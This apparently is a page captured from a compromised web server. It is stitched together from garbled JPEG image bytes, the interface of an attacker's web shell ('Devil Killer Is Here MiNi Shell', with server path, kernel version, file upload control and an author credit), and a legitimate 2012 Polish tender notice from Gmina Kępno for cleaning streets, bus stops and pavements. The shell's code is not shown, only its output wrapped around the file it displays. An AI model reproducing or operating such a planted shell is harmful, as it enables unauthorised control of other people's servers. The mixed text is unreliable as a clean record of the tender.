JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/482334-N-2012.html

<p class="kh_header"><b>Kępno: SPRZĄTANIE WYBRANYCH DRÓG BĘDĄCYCH W ZARZĄDZIE GMINY KĘPNO W 2013 R.</b><br>
<b>Numer ogłoszenia: 482334 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kępno , ul. Ratuszowa 1, 63-600 Kępno, woj. wielkopolskie, tel. 62 78 25 800, faks 62 78 25 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kepno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRZĄTANIE WYBRANYCH DRÓG BĘDĄCYCH W ZARZĄDZIE GMINY KĘPNO W 2013 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest: sprzątanie wybranych ulic miasta Kępna i osiedla Hanulin będących w zarządzie Gminy Kępno (zamiatanie mechaniczne lub ręczne jezdni, usuwanie chwastów z jezdni i chodników, czyszczenie i udrażnianie odwodnień liniowych); sprzątanie przystanków komunikacji publicznej na terenie gminy Kępno; sprzątanie, odśnieżanie i usuwanie gołoledzi na wybranych chodnikach w Gminie Kępno w okresie 1 stycznia 2013 r. - 31 grudnia 2013 r.
Sposób realizacji przedmiotu zamówienia określa projekt umowy, który stanowi integralną część niniejszej specyfikacji (załącznik 5).
Szczegółowy zakres umowy obejmuje wykonanie następujących prac:
1) sprzątanie (bez odśnieżania) wybranych ulic miasta Kępna i osiedla Hanulin będących w zarządzie Gminy Kępno (położonych poza strefą płatnego parkowania); szczegółowy wykaz ulic objętych niniejszą umową oraz częstotliwość sprzątania poszczególnych określa poniższa tabela:

Lp.	Nazwa ulicy	Powierzchnia (ha)	Częstotliwość sprzątania	Uwagi
1	Aleksandra Fredry	0,2569	co 1 miesiąc	
2	Armii Krajowej	3,9795	co 2 tygodnie	
3	Armii Poznań	0,1979	co 2 tygodnie	
4	Berwińskiego	0,1041	co 2 tygodnie	
5	Boczna	0,5267	co 2 tygodnie	
6	Bolesława Prusa	0,134	co 1 miesiąc	
7	Chopina	0,2527	co 2 tygodnie	
8	Cicha	0,2559	co 2 tygodnie	
9	Cichy Zaułek	0,1135	co 2 tygodnie	
10	Długa	0,9373	co 2 tygodnie	
11	Donata Wyderkowskiego	0,1263	co 2 tygodnie	
12	Elizy Orzeszkowej	0,2068	co 1 tydzień	
13	Estkowskiego	0,4103	co 1 tydzień	
14	Gimnazjalna	0,137	co 1 tydzień	
15	Graniczna	0,1878	co tydzień	
16	Gwardii Ludowej	0,3688	co 2 tygodnie	
17	Hanki Sawickiej	0,1017	co 1 tydzień	
18	Hipolita Młynarza	0,0367	co 2 tygodnie	
19	Janka Krasickiego	0,4158	co 1 tydzień	
20	Karłowicza	0,2536	co 2 tygodnie	
21	Kombatantów	0,1501	co 2 tygodnie	
22	Kraszewskiego	0,0621	co 1 tydzień	
23	Kręta	0,0813	co tydzień	
24	Krótka	0,0234	codziennie	
25	Ks. Mariana Magnuszewskiego	0,0772	codziennie	
26	Ks. Piotra Wawrzyniaka	0,5498	co 1 tydzień	wraz z parkingiem w rejonie szpitala
27	Lenino	0,0814	co 2 tygodnie	
28	Łazienkowa	0,1137	co 1 tydzień	
29	Łąkowa	0,0814	co 1 tydzień	
30	1 Maja	0,0079	co 1 tydzień	
31	3 Maja	0,0079	co 1 tydzień	
32	Manifestu Lipcowego	0,2904	co 1 tydzień	
33	Mickiewicza	0,1123	codziennie	
34	Młyńska	1,1702	co 1 tydzień	
35	Moniuszki	0,2609	co 2 tygodnie	
36	Monte Cassino	0,0798	co 2 tygodnie	
37	Nowa	0,2888	co 2 tygodnie	
38	Nowowiejskiego	0,3998	co 2 tygodnie	
39	Obrońców Pokoju	0,1264	codziennie	
40	Ofiar Oświęcimskich	0,0398	co 2 tygodnie	
41	Ofiar Torzeńca i Wyszanowa	0,0518	co 2 tygodnie	
42	Ogrodowa	0,0816	co 1 tydzień	
43	Paderewskiego	0,2569	co 2 tygodnie	
44	Parkowa	0,1494	co 1 tydzień	
45	Piotra Potworowskiego	0,0421	co 2 tygodnie	
46	PKWN	0,1245	co 2 tygodnie	
47	Plac Ks. Nowackiego	0,0601	co 1 tydzień	
48	Pogodna	0,1386	co 2 tygodnie	
49	Polna	0,2455	co 1 tydzień	
50	Powstańców Wielkopolskich	0,2488	co 1 tydzień	
51	PPR	0,2026	co 2 tygodnie	
52	PPS	0,2476	co 2 tygodnie	
53	Radosna 	0,1253	co 2 tygodnie	
54	Ruchu Oporu	0,6933	co 2 tygodnie	
55	Sienkiewicza 	0,158	codziennie	(od skrzyżowania z ul. Wiosny Ludów do skrzyżowania z ul. Wojska Polskiego)
56	Sieroca	0,0798	co 1 tydzień	
57	Skośna	0,3487	co 1 tydzień	
58	Skryta	0,0266	co 1 tydzień	
59	Słodowa 	0,0668	co 1 tydzień	
60	Słoneczna	0,5507	co 1 tydzień	
61	Spokojna	0,1107	co 1 tydzień	
62	Spółdzielcza	0,3814	co 1 tydzień	
63	Stara	0,1500	co 1 tydzień	
64	Strumykowa	0,0809	co 1 tydzień	
65	21 Stycznia	0,2455	co 1 tydzień	
66	Szkolna	0,4505	co 1 tydzień	
67	Szpitalna	0,1455	co 1 tydzień	
68	Szymanowskiego	0,1499	co 2 tygodnie	
69	Targowa	0,2455	co 1 tydzień	
70	Tęczowa	0,2771	co 2 tygodnie	
71	Tysiąclecia	0,3508	co 1 tydzień	
72	Walki Młodych	0,9989	co 1 tydzień	
73	Wesoła	0,2006	co 2 tygodnie	
74	Wiatrakowa	0,3784	co 1 tydzień	
75	Wincentego Schmidta	0,0398	co 2 tygodnie	
76	Wiosenna	0,2603	co 2 tygodnie	
77	Władysława Reymonta	0,0556	co 1 miesiąc	
78	Władysława Turowskiego	0,0147	co 2 tygodnie	
79	Wojska Polskiego	0,6342	co 1 tydzień	
80	Wolności	0,1615	co 1 tydzień	
81	Zacisze	0,1642	co 2 tygodnie	
82	Zamenhofa	0,1932	co 2 tygodnie	
83	Zamkowa	0,117	co 1 tydzień	
84	Zwycięstwa	0,2591	co 2 tygodnie	
85	Hanulin, ulice: Boczna, Bohaterów Westerplatte, Janusza Kusocińskiego, Kwiatowa, Leśna, Parkowa, Powstańców Wlkp., Wolności		co 2 tygodnie	Ulice osiedla Hanulin
				

Obowiązek wymieniony w niniejszym punkcie realizowany będzie poprzez:
a) zamiatanie mechaniczne jezdni, a w przypadku braku takiej możliwości  poprzez zamiatanie ręczne,
b) usuwanie mechaniczne lub chemiczne chwastów z jezdni i chodników,
c) czyszczenie i udrażnianie odwodnień liniowych (kratek ściekowych) wraz z utrzymaniem ich w odpowiednim stanie technicznym (mocowanie luźnych elementów w sposób trwały).

2) sprzątanie przystanków komunikacji publicznej na terenie gminy Kępno;
Wykaz przystanków (z podziałem na wiaty, zatoki i przystanki przy znakach drogowych) przedstawia poniższa tabela:

Lp.	Adres przystanku	Rodzaj i ilość przystanków	Częstotliwość sprzątania	Uwagi
1	Kępno, Aleje Marcinkowskiego	zatoka	3x/tydz.	
2	Kępno, ul. Broniewskiego	zatoka	5x/tydz.	
3	Kępno, ul. Dworcowa 	znak drogowy	3x/tydz.	
4	Kępno, ul. Kwiatowa	znak drogowy - 2 szt.	3x/tydz.	
5	Kępno, ul. Obr. Pokoju	zatoka - 2 szt.	3x/tydz.	
6	Kępno, ul. Osińska	znak drogowy	2x/tydz.	
7	Kępno, ul. Poznańska	wiata, zatoka, znak drogowy	3x/tydz.	
8	Kępno, ul. Przemysłowa	wiata	3x/tydz.	
9	Kępno, ul. Solidarności	wiata, zatoka	3x/tydz.	
10	Kępno, ul. Walki Młodych	znak drogowy	2x/tydz.	
11	Kępno, ul. Wieluńska	zatoka - 2 szt.	3x/tydz.	
12	Kępno, ul. Wrocławska	znak drogowy	2x/tydz.	
13	Borek Mielęcki	wiata	1x/tydz.	
14	Domanin	wiata - 3 szt.	1x/tydz.	
15	Hanuli	wiata - 3 szt.	2x/tydz.	
16	Kierzenko	wiata - 2 szt.; znak drogowy	1x/tydz.	
17	Kierzno	wiata	1x/tydz.	
18	Kliny 	wiata - 2 szt.; zatoki - 2 szt.; znak drogowy - 3 szt.	2x/tydz.	
19	Krążkowy	wiata, znak drogowy	2x/tydz.	
20	Mechnice	wiata - 3 szt.	2x/tydz.	
21	Mianowice	wiata, zatoka	2x/tydz.	
22	Mikorzyn	znak drogowy - 3 szt.; wiata - 3 szt.	2x/tydz.	
23	Myjomice	wiata - 4 szt.	2x/tydz.	
24	Olendry	znak drogowy	2x/tydz.	
25	Olszowa	wiata - 2 szt.; znak drogowy - 2 szt.	2x/tydz.	
26	Osiny	wiata - 2 szt.	2x/tydz.	
27	Ostrówiec	wiata	2x/tydz.	
28	Przybyszów 	wiata - 2 szt.	1x/tydz.	
29	Pustkowie Kierzeńskie 	wiata	1x/tydz.	
30	Rudniczysko - granica gminy	wiata	1x/2tyg.	
31	Rzetnia Motel Pod Borem	wiata - 2 szt.	2x/tydz.	
32	Rzetnia wieś	wiata	2x/tydz.	
33	Szklarka Mielęcka 	wiata - 3 szt.	2x/tydz.	
34	Świba	wiata - 4 szt.; znak drogowy - 1 szt.	2x/tydz.	
				

Ogółem: 46 wiat, 11 zatok, 19 znaków drogowych.
Obowiązek, o którym mowa w niniejszym punkcie będzie spełniany poprzez uprzątanie i pozbycie się błota, śniegu, lodu i innych zanieczyszczeń z przystanków komunikacyjnych z częstotliwością podaną w tabeli.

3) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na chodnikach przyległych do placu w obrębie ulicy Pocztowej (nieruchomość oznaczona numerem geodezyjnym 1969) od ulicy Staszica i ul. Kościuszki z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu,

4) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na chodniku przy byłym Kępińskim Domu Kultury w Rynku z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu,

5) sprzątanie i odśnieżanie chodnika przyległego do terenu byłego placu zabaw przy ulicy Ks. P. Wawrzyniaka oraz wzdłuż Przedszkola Samorządowego nr 5 z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu;

6) sprzątanie (w tym również grabienie i usuwanie liści), odśnieżanie i usuwanie skutków gołoledzi w obrębie następujących terenów zielonych w Kępnie:
a) aleja kasztanowa wzdłuż ulicy Hanki Sawickiej (działka nr 2020 o powierzchni 1.040 m2),
b) aleja kasztanowa wzdłuż ulicy Dąbrowskiego (działka nr 1905/1 o powierzchni 2.650 m2),
c) aleja topolowa przy Osiedlu 700-Lecia (działki nr 1655/1 i 1655/2 o łącznej powierzchni 2.913 m2).
Prace będą wykonywane poprzez sprzątanie wymienionych terenów raz w tygodniu, a w okresie opadów śniegu z częstotliwością dostosowaną do istniejącej sytuacji.

7) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na chodnikach u zbiegu ulic Spółdzielczej i Wiosny Ludów na odcinkach przyległych do nieruchomości oznaczonej numerem geodezyjnym 1867 (teren zielony) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu,

8) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na chodnikach u zbiegu ulic Aleje Marcinkowskiego, Walki Młodych i Tysiąclecia na odcinkach przyległych do nieruchomości oznaczonej numerem geodezyjnym 912/1 (teren zielony wraz z placem zabaw) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu,

9) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na parkingu i na chodnikach wokół parkingu przy kinie Sokolnia (u zbiegu ulic Aleje Marcinkowskiego i Walki Młodych) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu,

10) sprzątanie i odśnieżanie chodnika przy ulicy Walki Młodych wzdłuż terenu Kępińskiego Ośrodka Sportu i Rekreacji z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w miesiącu,

11) sprzątanie, odśnieżanie i usuwanie skutków gołoledzi na nieruchomościach przy ulicy Kościuszki oznaczonych numerami geodezyjnymi 1955 i 1956/4 (teren pomiędzy budynkami Kościuszki 5 i Kościuszki 9) oraz chodnika przy ulicy Kościuszki przyległego do wymienionych nieruchomości z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.000,00 zł (dziesięć tysięcy 00/100 złotych)
1. Wadium może być wniesione w następujących formach:
1/ pieniądzu, 
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3/ gwarancjach bankowych,
4/ gwarancjach ubezpieczeniowych,
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
Wadium w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego w Banku Zachodnim WBK S.A.. Oddział w Kępnie nr rachunku 65 1090 1144 0000 0000 1400 3711.
Wadium w innej formie niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno, dołączając do oferty potwierdzenie złożenia wadium.
2. Wadium wnosi się przed terminem składania ofert.
3. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyn nieleżących po jego stronie.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli przedłoży zezwolenie na prowadzenie działalności w zakresie transportu odpadów, o którym mowa w art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243, Nr 203, poz. 1351, z 2011 r. Nr 106, poz. 622, Nr 117, poz. 678, Nr 138, poz. 809, Nr 152, poz. 897, Nr 171, poz. 1016, z 2012 r. poz. 951).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej przez 3 miesiące świadczył usługi polegające na sprzątaniu dróg.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Kępnie
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie - SEKRETARIAT
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com